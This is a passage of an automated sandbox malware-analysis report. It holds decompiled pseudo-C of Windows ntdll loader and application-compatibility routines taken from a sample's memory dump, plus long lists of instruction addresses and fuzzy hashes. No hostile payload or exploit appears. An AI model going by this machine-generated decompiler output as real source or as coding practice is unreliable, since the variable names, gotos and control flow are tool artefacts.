                                                                                                                                                                                      											}
                                                                                                                                                                                      											_t323 =  *[fs:0x18];
                                                                                                                                                                                      											_v380 = _t323;
                                                                                                                                                                                      											if( *((intOrPtr*)(_t323 + 0xf88)) != 0) {
                                                                                                                                                                                      												_v160 = _v160 | 0x00000080;
                                                                                                                                                                                      											}
                                                                                                                                                                                      										}
                                                                                                                                                                                      										_v8 = 8;
                                                                                                                                                                                      										_t361 = _v272;
                                                                                                                                                                                      										_t384 =  *((intOrPtr*)( *_t361));
                                                                                                                                                                                      										_push(_t361);
                                                                                                                                                                                      										_push( &_v216);
                                                                                                                                                                                      										if(_t384 != E1D846B70) {
                                                                                                                                                                                      											__eflags = _t384 - E1D8456E0;
                                                                                                                                                                                      											if(_t384 != E1D8456E0) {
                                                                                                                                                                                      												 *0x1d9391e0();
                                                                                                                                                                                      												 *_t384();
                                                                                                                                                                                      											} else {
                                                                                                                                                                                      												E1D8456E0(_t361);
                                                                                                                                                                                      											}
                                                                                                                                                                                      										} else {
                                                                                                                                                                                      											E1D846B70();
                                                                                                                                                                                      										}
                                                                                                                                                                                      										goto L33;
                                                                                                                                                                                      									}
                                                                                                                                                                                      								}
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_t268 =  *0x7ffe03c0;
                                                                                                                                                                                      							goto L16;
                                                                                                                                                                                      						}
                                                                                                                                                                                      					}
                                                                                                                                                                                      					E1D847F98(_t341, _t377,  &_v244, _t377, _t379, _t394);
                                                                                                                                                                                      					_v252 = 1;
                                                                                                                                                                                      					_t379 = _v292;
                                                                                                                                                                                      					L1D852330(_t379 + 0x250, _t379 + 0x250);
                                                                                                                                                                                      					_v8 = 4;
                                                                                                                                                                                      					_t332 = _t379 + 0x254;
                                                                                                                                                                                      					_t368 =  *((intOrPtr*)(_t332 + 4));
                                                                                                                                                                                      					if( *_t368 != _t332) {
                                                                                                                                                                                      						asm("int 0x29");
                                                                                                                                                                                      						__eflags = _v292 + 0x250;
                                                                                                                                                                                      						return E1D8524D0(_v292 + 0x250);
                                                                                                                                                                                      					}
                                                                                                                                                                                      					_v244 = _t332;
                                                                                                                                                                                      					_v240 = _t368;
                                                                                                                                                                                      					_t375 =  &_v244;
                                                                                                                                                                                      					 *_t368 = _t375;
                                                                                                                                                                                      					 *((intOrPtr*)(_t332 + 4)) = _t375;
                                                                                                                                                                                      					_v251 = 1;
                                                                                                                                                                                      					_v8 = 2;
                                                                                                                                                                                      					L71();
                                                                                                                                                                                      					E1D888F40( &_v216, 0, 0x98);
                                                                                                                                                                                      					_t389 = _t389 + 0xc;
                                                                                                                                                                                      					asm("lock inc dword [edi+0xf8]");
                                                                                                                                                                                      					_v250 = 1;
                                                                                                                                                                                      					_t371 =  &_v44;
                                                                                                                                                                                      					_t347 = _t377;
                                                                                                                                                                                      					E1D844A09(_t377,  &_v44, 0);
                                                                                                                                                                                      					goto L8;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				_t339 =  *((intOrPtr*)(_t377 + 0x24));
                                                                                                                                                                                      				_v388 = _t339;
                                                                                                                                                                                      				_push(_t339);
                                                                                                                                                                                      				_t340 = E1D8829A0();
                                                                                                                                                                                      				_v276 = _t340;
                                                                                                                                                                                      				if(_t340 < 0) {
                                                                                                                                                                                      					goto L73;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				asm("lock inc dword [edi]");
                                                                                                                                                                                      				_v246 = 1;
                                                                                                                                                                                      				goto L5;
                                                                                                                                                                                      			}












































































































                                                                                                                                                                                      0x1d8458e0
                                                                                                                                                                                      0x1d8458e0
                                                                                                                                                                                      0x1d8458e0
                                                                                                                                                                                      0x1d8458e5
                                                                                                                                                                                      0x1d8458e7
                                                                                                                                                                                      0x1d8458ec
                                                                                                                                                                                      0x1d8458f7
                                                                                                                                                                                      0x1d8458f8
                                                                                                                                                                                      0x1d8458fe
                                                                                                                                                                                      0x1d845903
                                                                                                                                                                                      0x1d845906
                                                                                                                                                                                      0x1d845908
                                                                                                                                                                                      0x1d84590b
                                                                                                                                                                                      0x1d84590c
                                                                                                                                                                                      0x1d84590d
                                                                                                                                                                                      0x1d84590e
                                                                                                                                                                                      0x1d845912
                                                                                                                                                                                      0x1d845918
                                                                                                                                                                                      0x1d84591b
                                                                                                                                                                                      0x1d84591e
                                                                                                                                                                                      0x1d845928
                                                                                                                                                                                      0x1d84592e
                                                                                                                                                                                      0x1d845935
                                                                                                                                                                                      0x1d84593c
                                                                                                                                                                                      0x1d845943
                                                                                                                                                                                      0x1d84594a
                                                                                                                                                                                      0x1d845951
                                                                                                                                                                                      0x1d845958
                                                                                                                                                                                      0x1d84595f
                                                                                                                                                                                      0x1d845966
                                                                                                                                                                                      0x1d845970
                                                                                                                                                                                      0x1d84597a
                                                                                                                                                                                      0x1d845985
                                                                                                                                                                                      0x1d84598b
                                                                                                                                                                                      0x1d845998
                                                                                                                                                                                      0x1d84599d
                                                                                                                                                                                      0x1d8459a3
                                                                                                                                                                                      0x1d8459a8
                                                                                                                                                                                      0x1d8459b0
                                                                                                                                                                                      0x1d8459b2
                                                                                                                                                                                      0x1d8459b8
                                                                                                                                                                                      0x1d8459b8
                                                                                                                                                                                      0x1d8459c8
                                                                                                                                                                                      0x1d8459cd
                                                                                                                                                                                      0x1d8459d0
                                                                                                                                                                                      0x1d8459d7
                                                                                                                                                                                      0x1d8459e5
                                                                                                                                                                                      0x1d8459ea
                                                                                                                                                                                      0x1d8459f8
                                                                                                                                                                                      0x1d8a0745
                                                                                                                                                                                      0x1d8a074f
                                                                                                                                                                                      0x1d8a074f
                                                                                                                                                                                      0x1d8a0756
                                                                                                                                                                                      0x1d845a25
                                                                                                                                                                                      0x1d845a25
                                                                                                                                                                                      0x1d845a2c
                                                                                                                                                                                      0x1d845a31
                                                                                                                                                                                      0x1d845a38
                                                                                                                                                                                      0x1d845fef
                                                                                                                                                                                      0x1d845fef
                                                                                                                                                                                      0x1d845ff6
                                                                                                                                                                                      0x1d845ffb
                                                                                                                                                                                      0x1d846002
                                                                                                                                                                                      0x1d846007
                                                                                                                                                                                      0x1d846007
                                                                                                                                                                                      0x1d846009
                                                                                                                                                                                      0x1d84600f
                                                                                                                                                                                      0x1d846017
                                                                                                                                                                                      0x1d84601c
                                                                                                                                                                                      0x1d84601c
                                                                                                                                                                                      0x1d845b95
                                                                                                                                                                                      0x1d845b99
                                                                                                                                                                                      0x1d845f2d
                                                                                                                                                                                      0x1d845f32
                                                                                                                                                                                      0x1d845f36
                                                                                                                                                                                      0x1d845f36
                                                                                                                                                                                      0x1d845ba1
                                                                                                                                                                                      0x1d845fcf
                                                                                                                                                                                      0x1d845fcf
                                                                                                                                                                                      0x1d845fd4
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d845fd6
                                                                                                                                                                                      0x1d845fd6
                                                                                                                                                                                      0x1d845fd9
                                                                                                                                                                                      0x1d8a07dc
                                                                                                                                                                                      0x1d8a07e3
                                                                                                                                                                                      0x1d8a07e5
                                                                                                                                                                                      0x1d8a07ea
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8a07ea
                                                                                                                                                                                      0x1d845fdf
                                                                                                                                                                                      0x1d845fe2
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d845fe8
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d845ba7
                                                                                                                                                                                      0x1d845ba9
                                                                                                                                                                                      0x1d845e71
                                                                                                                                                                                      0x1d845e77
                                                                                                                                                                                      0x1d845e79
                                                                                                                                                                                      0x1d845bb4
                                                                                                                                                                                      0x1d845bba
                                                                                                                                                                                      0x1d8a0836
                                                                                                                                                                                      0x1d8a083a
                                                                                                                                                                                      0x1d8a0841
                                                                                                                                                                                      0x1d8a0847
                                                                                                                                                                                      0x1d8a0847
                                                                                                                                                                                      0x1d845bd4
                                                                                                                                                                                      0x1d845bda
                                                                                                                                                                                      0x1d845be0
                                                                                                                                                                                      0x1d845be7
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d845bed
                                                                                                                                                                                      0x1d845bf3
                                                                                                                                                                                      0x1d845ae0
                                                                                                                                                                                      0x1d845ae0
                                                                                                                                                                                      0x1d845aec
                                                                                                                                                                                      0x1d845aef
                                                                                                                                                                                      0x1d845af2
                                                                                                                                                                                      0x1d845af5
                                                                                                                                                                                      0x1d845af8
                                                                                                                                                                                      0x1d845afb
                                                                                                                                                                                      0x1d845b07
                                                                                                                                                                                      0x1d845f69
                                                                                                                                                                                      0x1d845f73
                                                                                                                                                                                      0x1d845f8b
                                                                                                                                                                                      0x1d845f90
                                                                                                                                                                                      0x1d845f92
                                                                                                                                                                                      0x1d8a077f
                                                                                                                                                                                      0x1d8a077f
                                                                                                                                                                                      0x1d8a0789
                                                                                                                                                                                      0x1d845b43
                                                                                                                                                                                      0x1d845b43
                                                                                                                                                                                      0x1d845b49
                                                                                                                                                                                      0x1d845b53
                                                                                                                                                                                      0x1d845b5a
                                                                                                                                                                                      0x1d845b5d
                                                                                                                                                                                      0x1d845b66
                                                                                                                                                                                      0x1d845b67
                                                                                                                                                                                      0x1d845b6d
                                                                                                                                                                                      0x1d845b6e
                                                                                                                                                                                      0x1d845b74
                                                                                                                                                                                      0x1d845b7a
                                                                                                                                                                                      0x1d845b7b
                                                                                                                                                                                      0x1d845b80
                                                                                                                                                                                      0x1d845b86
                                                                                                                                                                                      0x1d845b8f
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d845b8f
                                                                                                                                                                                      0x1d845f98
                                                                                                                                                                                      0x1d845f98
                                                                                                                                                                                      0x1d845f9e
                                                                                                                                                                                      0x1d845fa0
                                                                                                                                                                                      0x1d845fa7
                                                                                                                                                                                      0x1d845fae
                                                                                                                                                                                      0x1d845fb1
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d845fb1
                                                                                                                                                                                      0x1d845b13
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d845b19
                                                                                                                                                                                      0x1d845b30
                                                                                                                                                                                      0x1d845b35
                                                                                                                                                                                      0x1d845b3b
                                                                                                                                                                                      0x1d845b41
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d845b41
                                                                                                                                                                                      0x1d845bf9
                                                                                                                                                                                      0x1d845bfe
                                                                                                                                                                                      0x1d845e84
                                                                                                                                                                                      0x1d845e8d
                                                                                                                                                                                      0x1d845e93
                                                                                                                                                                                      0x1d845ea1
                                                                                                                                                                                      0x1d845ea9
                                                                                                                                                                                      0x1d845eb4
                                                                                                                                                                                      0x1d845eb9
                                                                                                                                                                                      0x1d845ec0
                                                                                                                                                                                      0x1d845ec6
                                                                                                                                                                                      0x1d845ec7
                                                                                                                                                                                      0x1d845ed0
                                                                                                                                                                                      0x1d845ed1
                                                                                                                                                                                      0x1d845ed2
                                                                                                                                                                                      0x1d845ed8
                                                                                                                                                                                      0x1d845f15
                                                                                                                                                                                      0x1d845d52
                                                                                                                                                                                      0x1d845d52
                                                                                                                                                                                      0x1d845d59
                                                                                                                                                                                      0x1d845d60
                                                                                                                                                                                      0x1d8a0909
                                                                                                                                                                                      0x1d8a0909
                                                                                                                                                                                      0x1d845d6d
                                                                                                                                                                                      0x1d845d74
                                                                                                                                                                                      0x1d845d81
                                                                                                                                                                                      0x1d845d86
                                                                                                                                                                                      0x1d845d8d
                                                                                                                                                                                      0x1d845d9e
                                                                                                                                                                                      0x1d8a0955
                                                                                                                                                                                      0x1d8a0958
                                                                                                                                                                                      0x1d8a095e
                                                                                                                                                                                      0x1d8a0960
                                                                                                                                                                                      0x1d8a0963
                                                                                                                                                                                      0x1d8a0969
                                                                                                                                                                                      0x1d8a0969
                                                                                                                                                                                      0x1d8a096f
                                                                                                                                                                                      0x1d8a096f
                                                                                                                                                                                      0x1d8a096f
                                                                                                                                                                                      0x1d8a096f
                                                                                                                                                                                      0x1d8a0971
                                                                                                                                                                                      0x1d8a0977
                                                                                                                                                                                      0x1d8a0979
                                                                                                                                                                                      0x1d8a0989
                                                                                                                                                                                      0x1d8a0992
                                                                                                                                                                                      0x1d8a0998
                                                                                                                                                                                      0x1d8a099c
                                                                                                                                                                                      0x1d8a099e
                                                                                                                                                                                      0x1d8a09a4
                                                                                                                                                                                      0x1d8a09a6
                                                                                                                                                                                      0x1d8a09ac
                                                                                                                                                                                      0x1d8a09ac
                                                                                                                                                                                      0x1d8a09b4
                                                                                                                                                                                      0x1d8a09b4
                                                                                                                                                                                      0x1d8a09bc
                                                                                                                                                                                      0x1d8a09c6
                                                                                                                                                                                      0x1d8a09ce
                                                                                                                                                                                      0x1d8a09cf
                                                                                                                                                                                      0x1d8a09d1
                                                                                                                                                                                      0x1d8a09d4
                                                                                                                                                                                      0x1d845da4
                                                                                                                                                                                      0x1d845da4
                                                                                                                                                                                      0x1d845dac
                                                                                                                                                                                      0x1d845f0b
                                                                                                                                                                                      0x1d845f0b
                                                                                                                                                                                      0x1d845db8
                                                                                                                                                                                      0x1d8a09e2
                                                                                                                                                                                      0x1d8a09e9
                                                                                                                                                                                      0x1d8a09ef
                                                                                                                                                                                      0x1d8a09ef
                                                                                                                                                                                      0x1d845dbe
                                                                                                                                                                                      0x1d845dc1
                                                                                                                                                                                      0x1d845dc7
                                                                                                                                                                                      0x1d845dc9
                                                                                                                                                                                      0x1d845dcc
                                                                                                                                                                                      0x1d845dd2
                                                                                                                                                                                      0x1d845de0
                                                                                                                                                                                      0x1d845de0
                                                                                                                                                                                      0x1d845de2
                                                                                                                                                                                      0x1d845de8
                                                                                                                                                                                      0x1d845dea
                                                                                                                                                                                      0x1d845df0
                                                                                                                                                                                      0x1d845df3
                                                                                                                                                                                      0x1d845e00
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d845e08
                                                                                                                                                                                      0x1d845eec
                                                                                                                                                                                      0x1d845eef
                                                                                                                                                                                      0x1d8a09f9
                                                                                                                                                                                      0x1d8a0a00
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8a0a06
                                                                                                                                                                                      0x1d845ef7
                                                                                                                                                                                      0x1d845f00
                                                                                                                                                                                      0x1d845e29
                                                                                                                                                                                      0x1d845e29
                                                                                                                                                                                      0x1d845e2c
                                                                                                                                                                                      0x1d845e34
                                                                                                                                                                                      0x1d845e38
                                                                                                                                                                                      0x1d845e3a
                                                                                                                                                                                      0x1d845e40
                                                                                                                                                                                      0x1d845e42
                                                                                                                                                                                      0x1d845e4e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d845e58
                                                                                                                                                                                      0x1d845e58
                                                                                                                                                                                      0x1d845e5e
                                                                                                                                                                                      0x1d845e66
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d845e6c
                                                                                                                                                                                      0x1d845e4e
                                                                                                                                                                                      0x1d845e0e
                                                                                                                                                                                      0x1d845e0e
                                                                                                                                                                                      0x1d845e21
                                                                                                                                                                                      0x1d845e23
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d845e23
                                                                                                                                                                                      0x1d845de0
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d845d9e
                                                                                                                                                                                      0x1d845eda
                                                                                                                                                                                      0x1d845ee0
                                                                                                                                                                                      0x1d845f53
                                                                                                                                                                                      0x1d845f59
                                                                                                                                                                                      0x1d84602d
                                                                                                                                                                                      0x1d846033
                                                                                                                                                                                      0x1d846035
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d846035
                                                                                                                                                                                      0x1d845f5f
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d845f5f
                                                                                                                                                                                      0x1d845ee2
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d845ee2
                                                                                                                                                                                      0x1d845c04
                                                                                                                                                                                      0x1d845c0a
                                                                                                                                                                                      0x1d845c0b
                                                                                                                                                                                      0x1d845c11
                                                                                                                                                                                      0x1d845c1a
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d845c24
                                                                                                                                                                                      0x1d846047
                                                                                                                                                                                      0x1d84604c
                                                                                                                                                                                      0x1d84604c
                                                                                                                                                                                      0x1d845c2a
                                                                                                                                                                                      0x1d845c30
                                                                                                                                                                                      0x1d845c3a
                                                                                                                                                                                      0x1d845c40
                                                                                                                                                                                      0x1d845c4c
                                                                                                                                                                                      0x1d845c52
                                                                                                                                                                                      0x1d845c5f
                                                                                                                                                                                      0x1d845c68
                                                                                                                                                                                      0x1d845c71
                                                                                                                                                                                      0x1d845c7a
                                                                                                                                                                                      0x1d845c7d
                                                                                                                                                                                      0x1d845c85
                                                                                                                                                                                      0x1d845c9e
                                                                                                                                                                                      0x1d845ca1
                                                                                                                                                                                      0x1d845ca7
                                                                                                                                                                                      0x1d845cad
                                                                                                                                                                                      0x1d845cba
                                                                                                                                                                                      0x1d8a087c
                                                                                                                                                                                      0x1d845cc0
                                                                                                                                                                                      0x1d845cc0
                                                                                                                                                                                      0x1d845cc0
                                                                                                                                                                                      0x1d845cc4
                                                                                                                                                                                      0x1d8a0886
                                                                                                                                                                                      0x1d8a0889
                                                                                                                                                                                      0x1d8a0889
                                                                                                                                                                                      0x1d845cd1
                                                                                                                                                                                      0x1d8a0897
                                                                                                                                                                                      0x1d8a0897
                                                                                                                                                                                      0x1d845cf0
                                                                                                                                                                                      0x1d8a08a2
                                                                                                                                                                                      0x1d8a08a2
                                                                                                                                                                                      0x1d845cf6
                                                                                                                                                                                      0x1d845cfc
                                                                                                                                                                                      0x1d845d09
                                                                                                                                                                                      0x1d8a08ae
                                                                                                                                                                                      0x1d8a08ae
                                                                                                                                                                                      0x1d845d0f
                                                                                                                                                                                      0x1d845d15
                                                                                                                                                                                      0x1d845d22
                                                                                                                                                                                      0x1d8a08ba
                                                                                                                                                                                      0x1d8a08ba
                                                                                                                                                                                      0x1d845d22
                                                                                                                                                                                      0x1d845d28
                                                                                                                                                                                      0x1d845d2f
                                                                                                                                                                                      0x1d845d37
                                                                                                                                                                                      0x1d845d39
                                                                                                                                                                                      0x1d845d40
                                                                                                                                                                                      0x1d845d47
                                                                                                                                                                                      0x1d845f41
                                                                                                                                                                                      0x1d845f47
                                                                                                                                                                                      0x1d845fc2
                                                                                                                                                                                      0x1d845fc8
                                                                                                                                                                                      0x1d845f49
                                                                                                                                                                                      0x1d845f49
                                                                                                                                                                                      0x1d845f49
                                                                                                                                                                                      0x1d845d4d
                                                                                                                                                                                      0x1d845d4d
                                                                                                                                                                                      0x1d845d4d
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d845d47
                                                                                                                                                                                      0x1d845be7
                                                                                                                                                                                      0x1d845e7f
                                                                                                                                                                                      0x1d845baf
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d845baf
                                                                                                                                                                                      0x1d845ba1
                                                                                                                                                                                      0x1d845a46
                                                                                                                                                                                      0x1d845a4b
                                                                                                                                                                                      0x1d845a52
                                                                                                                                                                                      0x1d845a5f
                                                                                                                                                                                      0x1d845a64
                                                                                                                                                                                      0x1d845a6b
                                                                                                                                                                                      0x1d845a71
                                                                                                                                                                                      0x1d845a76
                                                                                                                                                                                      0x1d8a0772
                                                                                                                                                                                      0x1d846068
                                                                                                                                                                                      0x1d846073
                                                                                                                                                                                      0x1d846073
                                                                                                                                                                                      0x1d845a7c
                                                                                                                                                                                      0x1d845a82
                                                                                                                                                                                      0x1d845a88
                                                                                                                                                                                      0x1d845a8e
                                                                                                                                                                                      0x1d845a92
                                                                                                                                                                                      0x1d845a95
                                                                                                                                                                                      0x1d845a9c
                                                                                                                                                                                      0x1d845aa3
                                                                                                                                                                                      0x1d845ab6
                                                                                                                                                                                      0x1d845abb
                                                                                                                                                                                      0x1d845abe
                                                                                                                                                                                      0x1d845ac5
                                                                                                                                                                                      0x1d845ace
                                                                                                                                                                                      0x1d845ad1
                                                                                                                                                                                      0x1d845ad3
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d845ad3
                                                                                                                                                                                      0x1d8459fe
                                                                                                                                                                                      0x1d845a01
                                                                                                                                                                                      0x1d845a07
                                                                                                                                                                                      0x1d845a08
                                                                                                                                                                                      0x1d845a0d
                                                                                                                                                                                      0x1d845a15
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d845a1b
                                                                                                                                                                                      0x1d845a1e
                                                                                                                                                                                      0x00000000

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.2242251586.000000001D810000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D810000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.2244516243.000000001D939000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.2244545671.000000001D93D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1d810000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: @
                                                                                                                                                                                      • API String ID: 0-2766056989
                                                                                                                                                                                      • Opcode ID: c567f541fb571be370e37a30fae8eca7cb7b3dc5ac0f5a3370bdca3a930bb100
                                                                                                                                                                                      • Instruction ID: 1a0d0a8f69cdf7b946b0e95d096a1d7362c1c47545c06fdbc9325eb3b6b0d530
                                                                                                                                                                                      • Opcode Fuzzy Hash: c567f541fb571be370e37a30fae8eca7cb7b3dc5ac0f5a3370bdca3a930bb100
                                                                                                                                                                                      • Instruction Fuzzy Hash: D932377490426EDFDB21CF68C944BEDBBB0BF08304F1081E9E549A7A51D7756A84CFA2
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 63%
                                                                                                                                                                                      			E1D877550(void* __ecx) {
                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                      				char _v548;
                                                                                                                                                                                      				unsigned int _v552;
                                                                                                                                                                                      				unsigned int _v556;
                                                                                                                                                                                      				unsigned int _v560;
                                                                                                                                                                                      				char _v564;
                                                                                                                                                                                      				char _v568;
                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                      				unsigned int _t49;
                                                                                                                                                                                      				signed char _t53;
                                                                                                                                                                                      				unsigned int _t55;
                                                                                                                                                                                      				unsigned int _t56;
                                                                                                                                                                                      				unsigned int _t65;
                                                                                                                                                                                      				unsigned int _t66;
                                                                                                                                                                                      				void* _t68;
                                                                                                                                                                                      				unsigned int _t73;
                                                                                                                                                                                      				unsigned int _t77;
                                                                                                                                                                                      				unsigned int _t85;
                                                                                                                                                                                      				char* _t98;
                                                                                                                                                                                      				unsigned int _t102;
                                                                                                                                                                                      				signed int _t103;
                                                                                                                                                                                      				void* _t105;
                                                                                                                                                                                      				signed int _t107;
                                                                                                                                                                                      				void* _t108;
                                                                                                                                                                                      				void* _t110;
                                                                                                                                                                                      				void* _t111;
                                                                                                                                                                                      				void* _t112;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t45 =  *0x1d93b370 ^ _t107;
                                                                                                                                                                                      				_v8 =  *0x1d93b370 ^ _t107;
                                                                                                                                                                                      				_t105 = __ecx;
                                                                                                                                                                                      				if( *0x1d936664 == 0) {
                                                                                                                                                                                      					L5:
                                                                                                                                                                                      					return E1D884B50(_t45, _t85, _v8 ^ _t107, _t102, _t105, _t106);
                                                                                                                                                                                      				}
                                                                                                                                                                                      				_t85 = 0;
                                                                                                                                                                                      				E1D84E580(3,  *((intOrPtr*)(__ecx + 0x18)), 0, 0,  &_v564);
                                                                                                                                                                                      				if(( *0x7ffe02d5 & 0x00000003) == 0) {
                                                                                                                                                                                      					_t45 = 0;
                                                                                                                                                                                      				} else {
                                                                                                                                                                                      					_t45 =  *(_v564 + 0x5f) & 0x00000001;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				if(_t45 == 0) {
                                                                                                                                                                                      					_v556 = _t85;
                                                                                                                                                                                      					_t49 = E1D877738(_t105);
                                                                                                                                                                                      					__eflags = _t49;
                                                                                                                                                                                      					if(_t49 != 0) {
                                                                                                                                                                                      						L15:
                                                                                                                                                                                      						_t103 = 2;
                                                                                                                                                                                      						_v556 = _t103;
                                                                                                                                                                                      						L10:
                                                                                                                                                                                      						__eflags = ( *0x7ffe02d5 & 0x0000000c) - 4;
                                                                                                                                                                                      						if(( *0x7ffe02d5 & 0x0000000c) == 4) {
                                                                                                                                                                                      							_t45 = 1;
                                                                                                                                                                                      						} else {
                                                                                                                                                                                      							_t53 = E1D87763B(_v564);
                                                                                                                                                                                      							asm("sbb al, al");
                                                                                                                                                                                      							_t45 =  ~_t53 + 1;
                                                                                                                                                                                      							__eflags = _t45;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						__eflags = _t45;
                                                                                                                                                                                      						if(_t45 == 0) {
                                                                                                                                                                                      							_t102 = _t103 | 0x00000040;
                                                                                                                                                                                      							_v556 = _t102;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						__eflags = _t102;
                                                                                                                                                                                      						if(_t102 != 0) {
                                                                                                                                                                                      							L33:
                                                                                                                                                                                      							_push(4);
                                                                                                                                                                                      							_push( &_v556);
                                                                                                                                                                                      							_push(0x22);
                                                                                                                                                                                      							_push(0xffffffff);
                                                                                                                                                                                      							_t45 = E1D882B70();
                                                                                                                                                                                      						}
                                                                                                                                                                                      						goto L4;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					_v552 = _t85;
                                                                                                                                                                                      					_t102 =  &_v552;
                                                                                                                                                                                      					_t55 = E1D8776ED(_t105 + 0x2c, _t102);
                                                                                                                                                                                      					__eflags = _t55;
                                                                                                                                                                                      					if(_t55 >= 0) {
                                                                                                                                                                                      						__eflags = _v552 - _t85;
                                                                                                                                                                                      						if(_v552 == _t85) {
                                                                                                                                                                                      							goto L8;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_t85 = _t105 + 0x24;
                                                                                                                                                                                      						E1D8CEF10(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v552);
                                                                                                                                                                                      						_v560 = 0x214;
                                                                                                                                                                                      						E1D888F40( &_v548, 0, 0x214);
                                                                                                                                                                                      						_t106 =  *0x1d936664;
                                                                                                                                                                                      						_t110 = _t108 + 0x20;
                                                                                                                                                                                      						 *0x1d9391e0( *((intOrPtr*)(_t105 + 0x28)),  *((intOrPtr*)(_t105 + 0x18)),  *((intOrPtr*)(_t105 + 0x20)), L"ExecuteOptions",  &_v568,  &_v548,  &_v560, _t85);
                                                                                                                                                                                      						_t65 =  *((intOrPtr*)( *0x1d936664))();
                                                                                                                                                                                      						__eflags = _t65;
                                                                                                                                                                                      						if(_t65 == 0) {
                                                                                                                                                                                      							goto L8;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_t66 = _v560;
                                                                                                                                                                                      						__eflags = _t66;
                                                                                                                                                                                      						if(_t66 == 0) {
                                                                                                                                                                                      							goto L8;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						__eflags = _t66 - 0x214;
                                                                                                                                                                                      						if(_t66 >= 0x214) {
                                                                                                                                                                                      							goto L8;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_t68 = (_t66 >> 1) * 2 - 2;
                                                                                                                                                                                      						__eflags = _t68 - 0x214;
                                                                                                                                                                                      						if(_t68 >= 0x214) {
                                                                                                                                                                                      							E1D884C68();
                                                                                                                                                                                      							goto L33;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_push(_t85);
                                                                                                                                                                                      						 *((short*)(_t107 + _t68 - 0x220)) = 0;
                                                                                                                                                                                      						E1D8CEF10(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v548);
                                                                                                                                                                                      						_t111 = _t110 + 0x14;
                                                                                                                                                                                      						_t73 = E1D88A9C0( &_v548, L"Execute=1");
                                                                                                                                                                                      						_push(_t85);
                                                                                                                                                                                      						__eflags = _t73;
                                                                                                                                                                                      						if(_t73 == 0) {
                                                                                                                                                                                      							E1D8CEF10(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v548);
                                                                                                                                                                                      							_t106 =  &_v548;
                                                                                                                                                                                      							_t98 =  &_v548;
                                                                                                                                                                                      							_t112 = _t111 + 0x14;
                                                                                                                                                                                      							_t77 = _v560 + _t98;
                                                                                                                                                                                      							_v552 = _t77;
                                                                                                                                                                                      							__eflags = _t98 - _t77;
                                                                                                                                                                                      							if(_t98 >= _t77) {
                                                                                                                                                                                      								goto L8;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								goto L27;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							do {
                                                                                                                                                                                      								L27:
                                                                                                                                                                                      								_t85 = E1D88A690(_t106, 0x20);
                                                                                                                                                                                      								__eflags = _t85;
                                                                                                                                                                                      								if(__eflags != 0) {
                                                                                                                                                                                      									__eflags = 0;
                                                                                                                                                                                      									 *_t85 = 0;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								E1D8CEF10(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t106);
                                                                                                                                                                                      								_t112 = _t112 + 0x10;
